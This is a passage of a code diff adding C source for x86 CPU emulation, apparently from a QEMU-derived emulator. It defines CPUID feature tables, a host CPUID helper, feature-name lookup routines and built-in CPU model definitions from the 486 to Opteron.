(CPUID_EXT3_LAHF_LM | CPUID_EXT3_SVM | \ + CPUID_EXT3_CR8LEG | CPUID_EXT3_ABM | CPUID_EXT3_SSE4A) +#define TCG_EXT4_FEATURES 0 +#define TCG_SVM_FEATURES 0 +#define TCG_KVM_FEATURES 0 +#define TCG_7_0_EBX_FEATURES (CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_SMAP | \ + CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ADX) + /* missing: + CPUID_7_0_EBX_FSGSBASE, CPUID_7_0_EBX_HLE, CPUID_7_0_EBX_AVX2, + CPUID_7_0_EBX_ERMS, CPUID_7_0_EBX_INVPCID, CPUID_7_0_EBX_RTM, + CPUID_7_0_EBX_RDSEED */ +#define TCG_APM_FEATURES 0 + + +typedef struct FeatureWordInfo { + const char **feat_names; + uint32_t cpuid_eax; /* Input EAX for CPUID */ + bool cpuid_needs_ecx; /* CPUID instruction uses ECX as input */ + uint32_t cpuid_ecx; /* Input ECX value for CPUID */ + int cpuid_reg; /* output register (R_* constant) */ + uint32_t tcg_features; /* Feature flags supported by TCG */ + uint32_t unmigratable_flags; /* Feature flags known to be unmigratable */ +} FeatureWordInfo; + +static FeatureWordInfo feature_word_info[FEATURE_WORDS] = { +#ifdef _MSC_VER + // FEAT_1_EDX + { + feature_name, + 1, + false,0, + R_EDX, + TCG_FEATURES, + }, + // FEAT_1_ECX + { + ext_feature_name, + 1, + false,0, + R_ECX, + TCG_EXT_FEATURES, + }, + // FEAT_7_0_EBX + { + cpuid_7_0_ebx_feature_name, + 7, + true, 0, + R_EBX, + TCG_7_0_EBX_FEATURES, + }, + // FEAT_8000_0001_EDX + { + ext2_feature_name, + 0x80000001, + false,0, + R_EDX, + TCG_EXT2_FEATURES, + }, + // FEAT_8000_0001_ECX + { + ext3_feature_name, + 0x80000001, + false,0, + R_ECX, + TCG_EXT3_FEATURES, + }, + // FEAT_8000_0007_EDX + { + cpuid_apm_edx_feature_name, + 0x80000007, + false,0, + R_EDX, + TCG_APM_FEATURES, + CPUID_APM_INVTSC, + }, + // FEAT_C000_0001_EDX + { + ext4_feature_name, + 0xC0000001, + false,0, + R_EDX, + TCG_EXT4_FEATURES, + }, + // FEAT_KVM + {0}, + // FEAT_SVM + {0}, +#else + [FEAT_1_EDX] = { + .feat_names = feature_name, + .cpuid_eax = 1, .cpuid_reg = R_EDX, + .tcg_features = TCG_FEATURES, + }, + [FEAT_1_ECX] = { + .feat_names = 
ext_feature_name, + .cpuid_eax = 1, .cpuid_reg = R_ECX, + .tcg_features = TCG_EXT_FEATURES, + }, + [FEAT_8000_0001_EDX] = { + .feat_names = ext2_feature_name, + .cpuid_eax = 0x80000001, .cpuid_reg = R_EDX, + .tcg_features = TCG_EXT2_FEATURES, + }, + [FEAT_8000_0001_ECX] = { + .feat_names = ext3_feature_name, + .cpuid_eax = 0x80000001, .cpuid_reg = R_ECX, + .tcg_features = TCG_EXT3_FEATURES, + }, + [FEAT_C000_0001_EDX] = { + .feat_names = ext4_feature_name, + .cpuid_eax = 0xC0000001, .cpuid_reg = R_EDX, + .tcg_features = TCG_EXT4_FEATURES, + }, + [FEAT_7_0_EBX] = { + .feat_names = cpuid_7_0_ebx_feature_name, + .cpuid_eax = 7, + .cpuid_needs_ecx = true, .cpuid_ecx = 0, + .cpuid_reg = R_EBX, + .tcg_features = TCG_7_0_EBX_FEATURES, + }, + [FEAT_8000_0007_EDX] = { + .feat_names = cpuid_apm_edx_feature_name, + .cpuid_eax = 0x80000007, + .cpuid_reg = R_EDX, + .tcg_features = TCG_APM_FEATURES, + .unmigratable_flags = CPUID_APM_INVTSC, + }, +#endif +}; + +typedef struct X86RegisterInfo32 { + /* Name of register */ + const char *name; + /* QAPI enum value register */ + X86CPURegister32 qapi_enum; +} X86RegisterInfo32; + +#define REGISTER(reg) \ + { #reg, X86_CPU_REGISTER32_##reg } +static const X86RegisterInfo32 x86_reg_info_32[CPU_NB_REGS32] = { + REGISTER(EAX), + REGISTER(ECX), + REGISTER(EDX), + REGISTER(EBX), + REGISTER(ESP), + REGISTER(EBP), + REGISTER(ESI), + REGISTER(EDI), +}; +#undef REGISTER + +typedef struct ExtSaveArea { + uint32_t feature, bits; + uint32_t offset, size; +} ExtSaveArea; + +const char *get_register_name_32(unsigned int reg) +{ + if (reg >= CPU_NB_REGS32) { + return NULL; + } + return x86_reg_info_32[reg].name; +} + +#ifdef _MSC_VER +#include +#endif + +void host_cpuid(uint32_t function, uint32_t count, + uint32_t *eax, uint32_t *ebx, uint32_t *ecx, uint32_t *edx) +{ + uint32_t vec[4]; + +#ifdef _MSC_VER + __cpuidex((int*)vec, function, count); +#else +#ifdef __x86_64__ + asm volatile("cpuid" + : "=a"(vec[0]), "=b"(vec[1]), + "=c"(vec[2]), 
"=d"(vec[3]) + : "0"(function), "c"(count) : "cc"); +#elif defined(__i386__) + asm volatile("pusha \n\t" + "cpuid \n\t" + "mov %%eax, 0(%2) \n\t" + "mov %%ebx, 4(%2) \n\t" + "mov %%ecx, 8(%2) \n\t" + "mov %%edx, 12(%2) \n\t" + "popa" + : : "a"(function), "c"(count), "S"(vec) + : "memory", "cc"); +#else + abort(); +#endif +#endif // _MSC_VER + + if (eax) + *eax = vec[0]; + if (ebx) + *ebx = vec[1]; + if (ecx) + *ecx = vec[2]; + if (edx) + *edx = vec[3]; +} + +#define iswhite(c) ((c) && ((c) <= ' ' || '~' < (c))) + +/* general substring compare of *[s1..e1) and *[s2..e2). sx is start of + * a substring. ex if !NULL points to the first char after a substring, + * otherwise the string is assumed to sized by a terminating nul. + * Return lexical ordering of *s1:*s2. + */ +static int sstrcmp(const char *s1, const char *e1, + const char *s2, const char *e2) +{ + for (;;) { + if (!*s1 || !*s2 || *s1 != *s2) + return (*s1 - *s2); + ++s1, ++s2; + if (s1 == e1 && s2 == e2) + return (0); + else if (s1 == e1) + return (*s2); + else if (s2 == e2) + return (*s1); + } +} + +/* compare *[s..e) to *altstr. *altstr may be a simple string or multiple + * '|' delimited (possibly empty) strings in which case search for a match + * within the alternatives proceeds left to right. Return 0 for success, + * non-zero otherwise. 
+ */ +static int altcmp(const char *s, const char *e, const char *altstr) +{ + const char *p, *q; + + for (q = p = altstr; ; ) { + while (*p && *p != '|') + ++p; + if ((q == p && !*s) || (q != p && !sstrcmp(s, e, q, p))) + return (0); + if (!*p) + return (1); + else + q = ++p; + } +} + +/* search featureset for flag *[s..e), if found set corresponding bit in + * *pval and return true, otherwise return false + */ +static bool lookup_feature(uint32_t *pval, const char *s, const char *e, + const char **featureset) +{ + uint32_t mask; + const char **ppc; + bool found = false; + + for (mask = 1, ppc = featureset; mask; mask <<= 1, ++ppc) { + if (*ppc && !altcmp(s, e, *ppc)) { + *pval |= mask; + found = true; + } + } + return found; +} + +static void add_flagname_to_bitmaps(const char *flagname, + FeatureWordArray words, + Error **errp) +{ + FeatureWord w; + for (w = 0; w < FEATURE_WORDS; w++) { + FeatureWordInfo *wi = &feature_word_info[w]; + if (wi->feat_names && + lookup_feature(&words[w], flagname, NULL, wi->feat_names)) { + break; + } + } + if (w == FEATURE_WORDS) { + error_setg(errp, "CPU feature %s not found", flagname); + } +} + +/* CPU class name definitions: */ + +#define X86_CPU_TYPE_SUFFIX "-" TYPE_X86_CPU +#define X86_CPU_TYPE_NAME(name) (name X86_CPU_TYPE_SUFFIX) + +/* Return type name for a given CPU model name + * Caller is responsible for freeing the returned string. 
+ */ +static char *x86_cpu_type_name(const char *model_name) +{ + return g_strdup_printf(X86_CPU_TYPE_NAME("%s"), model_name); +} + +static ObjectClass *x86_cpu_class_by_name(struct uc_struct *uc, const char *cpu_model) +{ + ObjectClass *oc; + char *typename; + + if (cpu_model == NULL) { + return NULL; + } + + typename = x86_cpu_type_name(cpu_model); + oc = object_class_by_name(uc, typename); + g_free(typename); + return oc; +} + +struct X86CPUDefinition { + const char *name; + uint32_t level; + uint32_t xlevel; + uint32_t xlevel2; + /* vendor is zero-terminated, 12 character ASCII string */ + char vendor[CPUID_VENDOR_SZ + 1]; + int family; + int model; + int stepping; + FeatureWordArray features; + char model_id[48]; + bool cache_info_passthrough; +}; + +static X86CPUDefinition builtin_x86_defs[] = { + { + "qemu64", + 4, 0x8000000A, 0, + CPUID_VENDOR_AMD, + 6, 6, 3, + { + // FEAT_1_EDX + PPRO_FEATURES | + CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | + CPUID_PSE36, + // FEAT_1_ECX + CPUID_EXT_SSE3 | CPUID_EXT_CX16 | CPUID_EXT_POPCNT, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + (PPRO_FEATURES & CPUID_EXT2_AMD_ALIASES) | + CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM | CPUID_EXT3_SVM | + CPUID_EXT3_ABM | CPUID_EXT3_SSE4A, + }, + }, + { + "phenom", + 5, 0x8000001A, 0, + CPUID_VENDOR_AMD, + 16, 2, 3, + { + /* Missing: CPUID_HT */ + // FEAT_1_EDX + PPRO_FEATURES | + CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | + CPUID_PSE36 | CPUID_VME, + // FEAT_1_ECX + CPUID_EXT_SSE3 | CPUID_EXT_MONITOR | CPUID_EXT_CX16 | + CPUID_EXT_POPCNT, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + (PPRO_FEATURES & CPUID_EXT2_AMD_ALIASES) | + CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX | + CPUID_EXT2_3DNOW | CPUID_EXT2_3DNOWEXT | CPUID_EXT2_MMXEXT | + CPUID_EXT2_FFXSR | CPUID_EXT2_PDPE1GB | CPUID_EXT2_RDTSCP, + /* Missing: CPUID_EXT3_CMP_LEG, CPUID_EXT3_EXTAPIC, + CPUID_EXT3_CR8LEG, + CPUID_EXT3_MISALIGNSSE, CPUID_EXT3_3DNOWPREFETCH, + 
CPUID_EXT3_OSVW, CPUID_EXT3_IBS */ + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM | CPUID_EXT3_SVM | + CPUID_EXT3_ABM | CPUID_EXT3_SSE4A, + // FEAT_8000_0007_EDX + 0, + // FEAT_C000_0001_EDX + 0, + // FEAT_KVM + 0, + /* Missing: CPUID_SVM_LBRV */ + // FEAT_SVM + CPUID_SVM_NPT, + }, + "AMD Phenom(tm) 9550 Quad-Core Processor", + }, + { + "core2duo", + 10, 0x80000008, 0, + CPUID_VENDOR_INTEL, + 6, 15, 11, + { + /* Missing: CPUID_DTS, CPUID_HT, CPUID_TM, CPUID_PBE */ + // FEAT_1_EDX + PPRO_FEATURES | + CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | + CPUID_PSE36 | CPUID_VME | CPUID_ACPI | CPUID_SS, + /* Missing: CPUID_EXT_DTES64, CPUID_EXT_DSCPL, CPUID_EXT_EST, + * CPUID_EXT_TM2, CPUID_EXT_XTPR, CPUID_EXT_PDCM, CPUID_EXT_VMX */ + // FEAT_1_ECX + CPUID_EXT_SSE3 | CPUID_EXT_MONITOR | CPUID_EXT_SSSE3 | + CPUID_EXT_CX16, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM, + }, + "Intel(R) Core(TM)2 Duo CPU T7700 @ 2.40GHz", + }, + { + "kvm64", + 5, 0x80000008, 0, + CPUID_VENDOR_INTEL, + 15, 6, 1, + { + /* Missing: CPUID_VME, CPUID_HT */ + // FEAT_1_EDX + PPRO_FEATURES | + CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | + CPUID_PSE36, + /* Missing: CPUID_EXT_POPCNT, CPUID_EXT_MONITOR */ + // FEAT_1_ECX + CPUID_EXT_SSE3 | CPUID_EXT_CX16, + // FEAT_7_0_EBX + 0, + /* Missing: CPUID_EXT2_PDPE1GB, CPUID_EXT2_RDTSCP */ + // FEAT_8000_0001_EDX + (PPRO_FEATURES & CPUID_EXT2_AMD_ALIASES) | + CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, + /* Missing: CPUID_EXT3_LAHF_LM, CPUID_EXT3_CMP_LEG, CPUID_EXT3_EXTAPIC, + CPUID_EXT3_CR8LEG, CPUID_EXT3_ABM, CPUID_EXT3_SSE4A, + CPUID_EXT3_MISALIGNSSE, CPUID_EXT3_3DNOWPREFETCH, + CPUID_EXT3_OSVW, CPUID_EXT3_IBS, CPUID_EXT3_SVM */ + // FEAT_8000_0001_ECX + 0, + }, + "Common KVM processor", + }, + { + "qemu32", + 4, 0x80000004, 0, + CPUID_VENDOR_INTEL, + 6, 6, 3, + { + // FEAT_1_EDX + PPRO_FEATURES, + // FEAT_1_ECX + CPUID_EXT_SSE3 | CPUID_EXT_POPCNT, + }, + }, + 
{ + "kvm32", + 5, 0x80000008, 0, + CPUID_VENDOR_INTEL, + 15, 6, 1, + { + // FEAT_1_EDX + PPRO_FEATURES | + CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_PSE36, + // FEAT_1_ECX + CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + PPRO_FEATURES & CPUID_EXT2_AMD_ALIASES, + // FEAT_8000_0001_ECX + 0, + }, + "Common 32-bit KVM processor", + }, + { + "coreduo", + 10, 0x80000008, 0, + CPUID_VENDOR_INTEL, + 6, 14, 8, + { + /* Missing: CPUID_DTS, CPUID_HT, CPUID_TM, CPUID_PBE */ + // FEAT_1_EDX + PPRO_FEATURES | CPUID_VME | + CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_ACPI | + CPUID_SS, + /* Missing: CPUID_EXT_EST, CPUID_EXT_TM2 , CPUID_EXT_XTPR, + * CPUID_EXT_PDCM, CPUID_EXT_VMX */ + // FEAT_1_ECX + CPUID_EXT_SSE3 | CPUID_EXT_MONITOR, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_NX, + }, + "Genuine Intel(R) CPU T2600 @ 2.16GHz", + }, + { + "486", + 1, 0, 0, + CPUID_VENDOR_INTEL, + 4, 8, 0, + { + // FEAT_1_EDX + I486_FEATURES, + }, + }, + { + "pentium", + 1, 0, 0, + CPUID_VENDOR_INTEL, + 5, 4, 3, + { + // FEAT_1_EDX + PENTIUM_FEATURES, + }, + }, + { + "pentium2", + 2, 0, 0, + CPUID_VENDOR_INTEL, + 6, 5, 2, + { + // FEAT_1_EDX + PENTIUM2_FEATURES, + }, + }, + { + "pentium3", + 2, 0, 0, + CPUID_VENDOR_INTEL, + 6, 7, 3, + { + // FEAT_1_EDX + PENTIUM3_FEATURES, + }, + }, + { + "athlon", + 2, 0x80000008, 0, + CPUID_VENDOR_AMD, + 6, 2, 3, + { + // FEAT_1_EDX + PPRO_FEATURES | CPUID_PSE36 | CPUID_VME | CPUID_MTRR | + CPUID_MCA, + // FEAT_1_ECX + 0, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + (PPRO_FEATURES & CPUID_EXT2_AMD_ALIASES) | + CPUID_EXT2_MMXEXT | CPUID_EXT2_3DNOW | CPUID_EXT2_3DNOWEXT, + }, + }, + { + "n270", + /* original is on level 10 */ + 5, 0x8000000A, 0, + CPUID_VENDOR_INTEL, + 6, 28, 2, + { + /* Missing: CPUID_DTS, CPUID_HT, CPUID_TM, CPUID_PBE */ + // FEAT_1_EDX + PPRO_FEATURES | + CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_VME | + CPUID_ACPI | CPUID_SS, + /* Some CPUs got no CPUID_SEP */ + /* Missing: CPUID_EXT_DSCPL, 
CPUID_EXT_EST, CPUID_EXT_TM2, + * CPUID_EXT_XTPR */ + // FEAT_1_ECX + CPUID_EXT_SSE3 | CPUID_EXT_MONITOR | CPUID_EXT_SSSE3 | + CPUID_EXT_MOVBE, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + (PPRO_FEATURES & CPUID_EXT2_AMD_ALIASES) | + CPUID_EXT2_NX, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM, + }, + "Intel(R) Atom(TM) CPU N270 @ 1.60GHz", + }, + { + "Conroe", + 4, 0x8000000A, 0, + CPUID_VENDOR_INTEL, + 6, 15, 3, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_SSSE3 | CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM, + }, + "Intel Celeron_4x0 (Conroe/Merom Class Core 2)", + }, + { + "Penryn", + 4, 0x8000000A, 0, + CPUID_VENDOR_INTEL, + 6, 23, 3, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | + CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM, + }, + "Intel Core 2 Duo P9xxx (Penryn Class Core 2)", + }, + { + "Nehalem", + 4, 0x8000000A, 0, + CPUID_VENDOR_INTEL, + 6, 26, 3, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // 
FEAT_1_ECX + CPUID_EXT_POPCNT | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | + CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM, + }, + "Intel Core i7 9xx (Nehalem Class Core i7)", + }, + { + "Westmere", + 11, 0x8000000A, 0, + CPUID_VENDOR_INTEL, + 6, 44, 1, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_SSE42 | + CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | + CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM, + }, + "Westmere E56xx/L56xx/X56xx (Nehalem-C)", + }, + { + "SandyBridge", + 0xd, 0x8000000A, 0, + CPUID_VENDOR_INTEL, + 6, 42, 1, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | + CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_POPCNT | + CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | + CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | + CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | + CPUID_EXT2_SYSCALL, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM, + }, + "Intel Xeon E312xx (Sandy Bridge)", + }, + { + "Haswell", + 0xd, 0x8000000A, 0, + CPUID_VENDOR_INTEL, + 6, 60, 1, + { + // FEAT_1_EDX + 
CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | + CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | + CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | + CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | + CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | + CPUID_EXT_PCID, + // FEAT_7_0_EBX + CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | + CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | + CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | + CPUID_7_0_EBX_RTM, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | + CPUID_EXT2_SYSCALL, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM, + }, + "Intel Core Processor (Haswell)", + }, + { + "Broadwell", + 0xd, 0x8000000A, 0, + CPUID_VENDOR_INTEL, + 6, 61, 2, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | + CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | + CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | + CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | + CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | + CPUID_EXT_PCID, + // FEAT_7_0_EBX + CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | + CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | + CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | + CPUID_7_0_EBX_RTM | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | + CPUID_7_0_EBX_SMAP, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | 
CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | + CPUID_EXT2_SYSCALL, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, + }, + "Intel Core Processor (Broadwell)", + }, + { + "Opteron_G1", + 5, 0x80000008, 0, + CPUID_VENDOR_AMD, + 15, 6, 1, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_FXSR | CPUID_EXT2_MMX | + CPUID_EXT2_NX | CPUID_EXT2_PSE36 | CPUID_EXT2_PAT | + CPUID_EXT2_CMOV | CPUID_EXT2_MCA | CPUID_EXT2_PGE | + CPUID_EXT2_MTRR | CPUID_EXT2_SYSCALL | CPUID_EXT2_APIC | + CPUID_EXT2_CX8 | CPUID_EXT2_MCE | CPUID_EXT2_PAE | CPUID_EXT2_MSR | + CPUID_EXT2_TSC | CPUID_EXT2_PSE | CPUID_EXT2_DE | CPUID_EXT2_FPU, + }, + "AMD Opteron 240 (Gen 1 Class Opteron)", + }, + { + "Opteron_G2", + 5, 0x80000008, 0, + CPUID_VENDOR_AMD, + 15, 6, 1, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_CX16 | CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_FXSR | + CPUID_EXT2_MMX | CPUID_EXT2_NX | CPUID_EXT2_PSE36 | + CPUID_EXT2_PAT | CPUID_EXT2_CMOV | CPUID_EXT2_MCA | + CPUID_EXT2_PGE | CPUID_EXT2_MTRR | CPUID_EXT2_SYSCALL | + CPUID_EXT2_APIC | CPUID_EXT2_CX8 | CPUID_EXT2_MCE | + CPUID_EXT2_PAE | CPUID_EXT2_MSR | CPUID_EXT2_TSC | CPUID_EXT2_PSE | + CPUID_EXT2_DE | CPUID_EXT2_FPU, + // FEAT_8000_0001_ECX + CPUID_EXT3_SVM | CPUID_EXT3_LAHF_LM, + }, + "AMD Opteron 22xx (Gen 2 Class Opteron)", + }, + { + 
"Opteron_G3", + 5, 0x80000008, 0, + CPUID_VENDOR_AMD, + 15, 6, 1, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_POPCNT | CPUID_EXT_CX16 | CPUID_EXT_MONITOR | + CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_FXSR | + CPUID_EXT2_MMX | CPUID_EXT2_NX | CPUID_EXT2_PSE36 | + CPUID_EXT2_PAT | CPUID_EXT2_CMOV | CPUID_EXT2_MCA | + CPUID_EXT2_PGE | CPUID_EXT2_MTRR | CPUID_EXT2_SYSCALL | + CPUID_EXT2_APIC | CPUID_EXT2_CX8 | CPUID_EXT2_MCE | + CPUID_EXT2_PAE | CPUID_EXT2_MSR | CPUID_EXT2_TSC | CPUID_EXT2_PSE | + CPUID_EXT2_DE | CPUID_EXT2_FPU, + // FEAT_8000_0001_ECX + CPUID_EXT3_MISALIGNSSE | CPUID_EXT3_SSE4A | + CPUID_EXT3_ABM | CPUID_EXT3_SVM | CPUID_EXT3_LAHF_LM, + }, + "AMD Opteron 23xx (Gen 3 Class Opteron)", + }, + { + "Opteron_G4", + 0xd, 0x8000001A, 0, + CPUID_VENDOR_AMD, + 21, 